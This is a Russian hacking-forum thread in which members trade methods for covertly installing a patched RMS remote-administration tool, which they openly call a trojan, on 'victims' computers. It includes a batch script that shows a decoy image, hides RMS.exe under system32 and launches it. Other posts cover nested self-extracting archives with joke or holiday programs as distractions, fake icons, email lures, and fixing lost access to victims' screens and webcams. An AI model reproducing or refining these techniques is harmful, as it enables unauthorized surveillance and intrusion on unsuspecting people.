RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. sekVAren
    sekVAren Новичок
    Симпатии:
    2
    Всё отлично! Почти всё работает! Автору и все +100 )))

    Только при создании sfx иди setup выдайт вопрос Вы уверены что хотите установит РМС?

    Не подскажите что это может быть?
     
    25 дек 2011
  2. pupup2
    pupup2 Новичок
    Симпатии:
    0
    sekVAren,блина,читай топ ::: ;)Чтобы Не запрашивалось подтверждение нужно поставить галочку на "Не запрашивать подтверждения" № 14 /facepalm

    Добавлено через 1 минуту
    ты неправильно сконфигурировал RMS в MSI конфигураторе....;)
     
    Последнее редактирование: 25 дек 2011
    25 дек 2011
  3. sekVAren
    sekVAren Новичок
    Симпатии:
    2
    НЕТ! НЕТ! НЕТ!

    Галочка выставлена. При запуске MSI сборки сообщение не выдаётся.

    ТОЛЬКО ПОСЛЕ упаковки в sfx или setup.

    А топ я весь перечитал.)


    1. Помогите мне плиз разобраться с этим сообщением
    2. Скажите что прописать в батнике или в комментариях sfx что бы при запуске из архива сразу извлекался (в текущую директорию) и запускался один отвлекающий файл

    Тут была идея по поводу запуска картинки, но я так и не понял реализована ли она. Чисто между прочим от себя хочу предложить запускать любую прикол - программку. Например: http://korsar16.narod.ru/prog.htm. Желательно что нибуть милое и веселящее. Это отвлекает сильнее чем картинка, весит не много и под видом "программы-прикола" можно скрыть "программу-сволоч".
     
    Последнее редактирование: 25 дек 2011
    25 дек 2011
  4. pupup2
    pupup2 Новичок
    Симпатии:
    0
    sekVAren,
    хмм..если ты все прочитал,то не должно быть проблемок..я сделал и setup.ехе запускает RMS и батник при сетапе-открывается картинка у меня и устанавливается RMS потом я вручную у жертвы переименовываю ехе ,на пропатченные,удаляя родные переименовав их зарание ,потом просто перезапускаю комп )) попробуй,может реально ты не почистил свой комп от RMS в реестре ?и тот мешает запустится новому.. идея с картинками реализована)) только незабудь ее засунуть в setup.ехе или sfx и в батнике,переименуй на название (наприм 1.jpg)
    @echo off
    copy /y 1.jpg %SYSTEMROOT%\1.jpg
    start %SYSTEMROOT%\1.jpg
    mkdir %systemroot%\system32\sysfiles
    copy /y "RMS.exe" "%SystemRoot%\system32\sysfiles\RMS.exe"
    attrib +s +h +r "%SystemRoot%/system32/sysfiles/RMS.exe"
    cd %SystemRoot%\system32\sysfiles
    start RMS.exe
    exit
     
    25 дек 2011
  5. vlader
    vlader Guest
    puppup2, ты думаешь что люди смотрят картинки только один раз? Я думаю нет. Сколько раз переустановится RMS и сколько раз тебе придёт ID на почту?
    Лучше подать это с репаком игры и заменить exeшник на sfx архив с RMS, и пусть он распаковывается в текущую папку. Первой командой в батнике должно быть game.exe
     
    26 дек 2011
  6. pupup2
    pupup2 Новичок
    Симпатии:
    0
    javascript:insertnick('vlader'); не да,все правильно,с каждым запуском новый ID ..ну а по поводу архива,все что хочешь можно запихнуть=):)
     
    26 дек 2011
  7. pupup2
    pupup2 Новичок
    Симпатии:
    0
    хмм..что то не могу подключится к вебке,моргает окошко и тут жу сбрасывается..(( :(/facepalm

    Добавлено через 38 минут
    это в версии 5.1 а в 5.0 -к вебке подключаюсь легко..хмм, и дело по моему не в пропатченых файлах,не подключится даже с родными RMS.exe ..глюк что ль на серваке? кото нить знает в чем дело?...с наступающим всех новым годиком !!!
     
    Последнее редактирование: 26 дек 2011
    26 дек 2011
  8. Ghostcrawler
    Ghostcrawler Новичок
    Симпатии:
    0
    Доброго времени суток, заполз сюда из темы http://www.xaker.name/forvb/showthread.php?t=20588&page=39 .
    Использую тамошнюю сборку, настроил, "закинул" , всё ок , пахало. Потом внезапно был разрыв. И при попытке уже переподсоеденится , постоянно показывало жертву как "не в сети". То что процессы там живы и т.д, это 100%. Никто ничего не закрывал и т.д. Просто дискон (жертва на тот момент разговаривала по голос + вебка, + вк музыка и т.д... лагало жутко у меня). Я ребутнул комп...и потом я начал конектится к самому себе ))) Понятное дело , суть была в том чо запустился (с стартом винды) R-server. И меня конектило к самому себе...я выключил его...и к жертве всёравно достучатся так и не смог.
    По читав тему (не полностью) задался вопросом, Internet-ID во время каждого запуска жертвы, разный?
    И хотелось бы спросить, как по вашему, каковы могли бы быть причины моего дисконетка с жертвой (она не пропадала в тот момент с онлайна, просто дискон).
    Ну и способы решения) заранее спасибо)
     
    27 дек 2011
  9. aigera
    aigera Новичок
    Симпатии:
    3
    ну ИД не может сам по себе меняться даже если перезаг. Скорей всего ты кому то ты еще раз этот же ИД(сборку) сунул идет конфликт или жертва удалила или глюк, теперь надо еще раз сунут жертве тот же троян
     
    27 дек 2011
  10. sekVAren
    sekVAren Новичок
    Симпатии:
    2
    Всем, привет, снова я)

    Обошёлся без всяких sfx и setup, просто сказал что склепал прогу - прошу протестить, мол, запускается хоть. Всё путём, НО...

    Вот что делает аваст:
    http://savepic.su/1072931.htm

    Это окошко постоянно висит в панели задачи и на нажатия либо не реагирует, либо реагирует как то криво: появляется три строчки:
    1. Открыть в песочнице
    2. Открыть как обычно
    3. Отменить открытие
    Но выбрать ничего не возможно.

    + не один плеер не воспроизводит видео (кроме виндовс медиа), комп после загрузки париться мин 10, паряться/не запускаются некоторые программы

    У кого то было такое? У меня первый раз. Я думаю что тут поможет только установка менее косячной программы и удаление этой. Что посоветуете? Google ??? :))
     
    27 дек 2011
  11. Ghostcrawler
    Ghostcrawler Новичок
    Симпатии:
    0
    Ну, сборку кидал другим людям, но для теста, и потом сразу же чистил её, и проверял проделанное, коннекта небыло и т.д. Жертва удалить не могла это 100%. + это уже 2ой случай. и каждый из них заканчивался одинакого - я смотрел удалённо экран несколько мин, затем стало сильнее и сильнее лагать, потом оп - разрыв. И больше подконективаться не удавалось, в обоих случаях. (решалось всё перезакидываением новой сборки с новым ID и т.д. и удалением старой.)
    :( Меда вобщем, ну главное с ID уточнил ) а то я привязку на мыло не делал, по этому и подумал что там может новый ID мне кудато "летит" в пустоту...и я зайти не могу)
     
    28 дек 2011
  12. sekVAren
    sekVAren Новичок
    Симпатии:
    2
    Хочу поделиться своей новогодней идеей.

    С этого момента и где то в течении ещё недели очень актуально поздравлять своих с Новым Годом, кстати, с новым ВАС ВСЕХ 2012 (ох уж эти майа :)))

    И я предлагаю следующее:
    1. Собираем сборку RMS по старой схеме
    2. Качаем какую бы то ни было новогоднюю утилиту (ёлку, снег, деда мороза, гирлянды)
    3. Ставим галочку напротив "показывать скрытые файлы и папки"
    4. Делаем нашу сборку скрытой
    5. Упаковываем две эти вещи в sfx, обе их запускаем после распаковки в текущую директорию и , наконец, иконку ставим аналогичную скачанной новогодней программы.

    Итак две идеи: новогодняя программа в качестве отвлекающего манёвра, и скрыть файл rms (зачем усложнять батниками и комментариями)

    А теперь вопрос, насчёт второй идеи. Почему тут ни слова об этом? В этом есть очевидные огромные минусы?
     
    28 дек 2011
  13. aigera
    aigera Новичок
    Симпатии:
    3
    ну это уже должен знать каждый нуб и экскременты ему тоже не помешают.... С НАСТУПАЮЩИМ ГОСПОДА!!!
     
    28 дек 2011
  14. vlader
    vlader Guest
    sekVAren,
    Новогодняя программа это можно, но нужно будет использовать не тот архив, который крах взял у создателя сборки из другой темы, и при этом нужно скрыть файл RMS. Это по какой старой схеме?
     
    28 дек 2011
  15. userlampa
    userlampa Новичок
    Симпатии:
    0
    автору ОГРОМНЫЙ РЕСПЕКТ !!! только у меня один косяк есть(((( может это было выше сказано но всю ветку перечитал и не нашел ответ на мою проблему к сожалению... вот и сама проблема)) на ПК жертвы устанавливается без какого либо палева РМС все отлично на следующий день пытаюсь подключится но не могу " якобы жертва не в сети хотя сервер на жертве запущен " посоветуйте плиз кто чем может !!! :(
     
    28 дек 2011
  16. vlader
    vlader Guest
    userlampa,
    Я думаю жертва ещё раз запустила файл, и тебе на почту пришёл ещё один ID.
     
    28 дек 2011
  17. damirtm58n
    damirtm58n Новичок
    Симпатии:
    0
    А есть ли эффективный метод приманивания жертвы для просмотра отправленного трояна? Картинка оболочка не годится, так как картинки в почтовом сервере отображаются, а троян нет, так же и видео
     
    29 дек 2011
  18. TDI
    TDI Новичок
    Симпатии:
    32
    думаю лутше разобрать сконфигурированный пакет и в другое место установку сделать
    по умалчанию в програм файл палевно будет

    программа Orca может разобрать
     
    29 дек 2011
  19. sekVAren
    sekVAren Новичок
    Симпатии:
    2
    Есть способ из ЛЮБОГО изображения сделать иконку и способ ЛЮБУЮ иконку ставить на sfx архив. Соответственно свой трой маскировать можешь под что захочешь. Можно вообще фотку жертвы поставить и как нибуть интересно подписать - должно сработать

    Добавлено через 12 минут
    да - нужен sfx архив - он проще :)"для нубов":) и надёжнее

    По старой схеме делаем саму самоустанавливающуюся сборку RMS - в первом посте темы описано.

    Я ещё немного помудрил:
    если есть вероятность что у жертвы открыты скрытые файлы,
    то можно запаковать сборку RMS в sfx,
    указать путь Program Files или TEMP.
    После чего ЭТОТ SFX запаковать в ЕЩЁ ОДИН SFX
    (вместе с отвлекающими манёврами: картинкой(ми), програмой(ми) и т.д.)
    указать путь распаковки: "текущая директория"
    и
    запустить после распаковки наш sfx с RMS

    таким образом "мухи отдельно котлеты отдельно"

    P.S. Не нашёл способ распаковывать разные файлы в разные директории - придумал такой вот

    Добавлено через 11 минут
    Господа!

    Нет соединения с жертвой. Она в сети (комп включен, инет тоже), сборка RMS удалёна была сразу, да и на имейл письма с новый id не приходили - повторный запуск, переустановка и смена id RMS исключена.

    Узнал, что жертва установила новый free Аваст с офф сайта. Подозреваю, что причина в этом.

    Если так, то RMS либо удалён, либо не запущен, либо не активен - в любом случае соединения нет.

    Вопрос в следующем. Можно ли каким то образом, зная ай пи компа закинуть туда и запустить один единственный файл? Какие сканеры позволяют это делать?

    Добавлено через 18 минут
    Нашёл статью на эту тему, но она 6ти летней давности, а программа которая там предлагается ищет НЕВЕРОЯТНО медленно - плиз, хелп :)
     
    Последнее редактирование: 29 дек 2011
    29 дек 2011
  20. damirtm58n
    damirtm58n Новичок
    Симпатии:
    0
    Есть проблема в том что этот троян будет отображаться при просмотре на почте не как картинка а как неизвестный файл, что вызовет подозрение и соответственно не скачают его
     
    29 дек 2011
Статус темы:
Закрыта.
Загрузка...